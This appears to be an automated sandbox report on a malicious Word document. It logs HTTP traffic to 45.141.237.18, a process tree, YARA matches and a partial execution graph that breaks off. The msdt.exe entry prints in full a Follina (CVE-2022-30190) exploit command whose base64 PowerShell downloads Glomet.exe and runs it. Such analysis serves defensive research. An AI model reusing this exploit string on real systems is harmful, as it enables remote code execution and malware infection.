                                                                                                                                                                            Jul 15, 2022 15:28:25.625997066 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625999928 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.626017094 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626033068 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626050949 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626055956 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.626068115 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626104116 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.626131058 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.631845951 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.631867886 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.631937027 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.631956100 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.659542084 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659571886 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659589052 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659605980 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659624100 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659641027 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659658909 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659674883 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659730911 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.659881115 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            • 45.141.237.18
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49743 | 45.141.237.18 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data

Jul 15, 2022 15:26:38.653311014 CEST | 1282 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 45.141.237.18

Jul 15, 2022 15:26:38.692662954 CEST | 1282 | IN | HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Fri, 15 Jul 2022 13:26:38 GMT
Content-Length: 0

Jul 15, 2022 15:26:38.766454935 CEST | 1282 | OUT | HEAD /Glomet.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 45.141.237.18

Jul 15, 2022 15:26:38.795556068 CEST | 1283 | IN | HTTP/1.1 200 OK
Content-Length: 13687
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "3136d726a397d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:38 GMT

Jul 15, 2022 15:26:41.906877995 CEST | 1284 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 45.141.237.18

Jul 15, 2022 15:26:41.980675936 CEST | 1284 | IN | HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Fri, 15 Jul 2022 13:26:41 GMT
Content-Length: 0

Jul 15, 2022 15:26:42.675403118 CEST | 1291 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 45.141.237.18

Jul 15, 2022 15:26:42.736707926 CEST | 1291 | IN | HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Fri, 15 Jul 2022 13:26:41 GMT
Content-Length: 0

Jul 15, 2022 15:26:42.776770115 CEST | 1291 | OUT | HEAD /Glomet.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 45.141.237.18

Jul 15, 2022 15:26:42.805774927 CEST | 1292 | IN | HTTP/1.1 200 OK
Content-Length: 13687
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "3136d726a397d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:41 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49744 | 45.141.237.18 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 15, 2022 15:26:42.139308929 CEST | 1285 | OUT | GET /Glomet.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 45.141.237.18
Connection: Keep-Alive
Jul 15, 2022 15:26:42.169883966 CEST | 1286 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "80119226a397d81:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:41 GMT
Content-Length: 4357
Jul 15, 2022 15:26:42.365726948 CEST | 1290 | OUT | HEAD /Glomet.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 45.141.237.18
Connection: Keep-Alive
Jul 15, 2022 15:26:42.398989916 CEST | 1290 | IN | HTTP/1.1 200 OK
Content-Length: 13687
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "3136d726a397d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:41 GMT
Jul 15, 2022 15:26:42.581449032 CEST | 1290 | OUT | HEAD /Glomet.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 45.141.237.18
Connection: Keep-Alive
Jul 15, 2022 15:26:42.629255056 CEST | 1291 | IN | HTTP/1.1 200 OK
Content-Length: 13687
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "3136d726a397d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:41 GMT
Jul 15, 2022 15:26:42.814599991 CEST | 1292 | OUT | GET /Glomet.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 45.141.237.18
If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMT
If-None-Match: "80119226a397d81:0"
Connection: Keep-Alive
Jul 15, 2022 15:26:42.846234083 CEST | 1292 | IN | HTTP/1.1 304 Not Modified
Date: Fri, 15 Jul 2022 13:26:41 GMT
Etag: "80119226a397d81:0"
Jul 15, 2022 15:26:42.859576941 CEST | 1293 | OUT | HEAD /Glomet.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 45.141.237.18
Connection: Keep-Alive
Jul 15, 2022 15:26:42.890403986 CEST | 1293 | IN | HTTP/1.1 200 OK
Content-Length: 13687
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "3136d726a397d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:41 GMT
Jul 15, 2022 15:26:43.063157082 CEST | 1293 | OUT | HEAD /Glomet.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 45.141.237.18
Connection: Keep-Alive
Jul 15, 2022 15:26:43.091305971 CEST | 1294 | IN | HTTP/1.1 200 OK
Content-Length: 13687
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
Accept-Ranges: bytes
ETag: "3136d726a397d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:43 GMT
Jul 15, 2022 15:26:43.149804115 CEST | 1294 | OUT | GET /icons/ubuntu-logo.png HTTP/1.1
Accept: */*
Referer: http://45.141.237.18/Glomet.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 45.141.237.18
Connection: Keep-Alive
Jul 15, 2022 15:26:43.180100918 CEST | 1295 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Fri, 15 Jul 2022 13:26:43 GMT
Content-Length: 1245
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
Jul 15, 2022 15:26:43.180160999 CEST | 1295 | IN | Data Raw: 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                            Data Ascii: </fieldset></div></div></body></html>
Jul 15, 2022 15:26:45.406270981 CEST | 1296 | OUT | HEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
Jul 15, 2022 15:26:45.437230110 CEST | 1297 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:45 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49766 | 45.141.237.18 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 15, 2022 15:28:25.418613911 CEST | 7929 | OUT | GET /Glomet.exe HTTP/1.1
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
Jul 15, 2022 15:28:25.452181101 CEST | 7931 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 21:48:58 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "7dc29185cb97d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:28:25 GMT
                                                                                                                                                                            Content-Length: 346688



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:15:26:31
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                            Imagebase:0x3f0000
                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:15:26:38
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:15:26:43
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
                                                                                                                                                                            Imagebase:0x12b0000
                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:15:27:15
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\splwow64.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                                            Imagebase:0x7ff78b240000
                                                                                                                                                                            File size:130560 bytes
                                                                                                                                                                            MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Target ID:20
                                                                                                                                                                            Start time:15:27:38
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:23
                                                                                                                                                                            Start time:15:27:45
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:25
                                                                                                                                                                            Start time:15:27:50
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:26
                                                                                                                                                                            Start time:15:27:52
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:15:28:27
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\ProgramData\Glomet.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\programdata\Glomet.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:346688 bytes
                                                                                                                                                                            MD5 hash:7A560CE2C90976F306953F3BF4EFEBF9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Target ID:30
                                                                                                                                                                            Start time:15:28:30
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:15:28:33
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Target ID:34
                                                                                                                                                                            Start time:15:28:45
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:CMD.EXE /C SET /A "0x00^75"
                                                                                                                                                                            Imagebase:0xc20000
                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Target ID:36
                                                                                                                                                                            Start time:15:28:46
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7c9170000
                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:26.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:17.3%
                                                                                                                                                                              Total number of Nodes:1316
                                                                                                                                                                              Total number of Limit Nodes:43
3906->3907 3908 401d65 3909 401d78 GetDlgItem 3908->3909 3910 401d6b 3908->3910 3912 401d72 3909->3912 3911 402c17 17 API calls 3910->3911 3911->3912 3913 401db9 GetClientRect LoadImageA SendMessageA 3912->3913 3914 402c39 17 API calls 3912->3914 3916 401e1a 3913->3916 3918 401e26 3913->3918 3914->3913 3917 401e1f DeleteObject 3916->3917 3916->3918 3917->3918 3919 404766 3920 404792 3919->3920 3921 4047a3 3919->3921 3980 405951 GetDlgItemTextA 3920->3980 3923 4047af GetDlgItem 3921->3923 3926 40480e 3921->3926 3925 4047c3 3923->3925 3924 40479d 3928 406535 5 API calls 3924->3928 3930 4047d7 SetWindowTextA 3925->3930 3935 405c82 4 API calls 3925->3935 3927 4048f2 3926->3927 3931 4062ea 17 API calls 3926->3931 3978 404a9c 3926->3978 3927->3978 3982 405951 GetDlgItemTextA 3927->3982 3928->3921 3933 4042d4 18 API calls 3930->3933 3936 404882 SHBrowseForFolderA 3931->3936 3932 404922 3937 405cd7 18 API calls 3932->3937 3938 4047f3 3933->3938 3934 40433b 8 API calls 3939 404ab0 3934->3939 3940 4047cd 3935->3940 3936->3927 3941 40489a CoTaskMemFree 3936->3941 3942 404928 3937->3942 3943 4042d4 18 API calls 3938->3943 3940->3930 3944 405be9 3 API calls 3940->3944 3945 405be9 3 API calls 3941->3945 3983 406257 lstrcpynA 3942->3983 3946 404801 3943->3946 3944->3930 3949 4048a7 3945->3949 3981 404309 SendMessageA 3946->3981 3950 4048de SetDlgItemTextA 3949->3950 3955 4062ea 17 API calls 3949->3955 3950->3927 3951 404807 3953 406663 5 API calls 3951->3953 3952 40493f 3954 406663 5 API calls 3952->3954 3953->3926 3962 404946 3954->3962 3956 4048c6 lstrcmpiA 3955->3956 3956->3950 3959 4048d7 lstrcatA 3956->3959 3957 404982 3984 406257 lstrcpynA 3957->3984 3959->3950 3960 404989 3961 405c82 4 API calls 3960->3961 3963 40498f GetDiskFreeSpaceA 3961->3963 3962->3957 3965 405c30 2 API calls 3962->3965 3967 4049da 3962->3967 3966 4049b3 MulDiv 3963->3966 3963->3967 3965->3962 3966->3967 3968 404a4b 3967->3968 3969 404be2 20 API calls 3967->3969 3970 404a6e 3968->3970 3972 40140b 2 
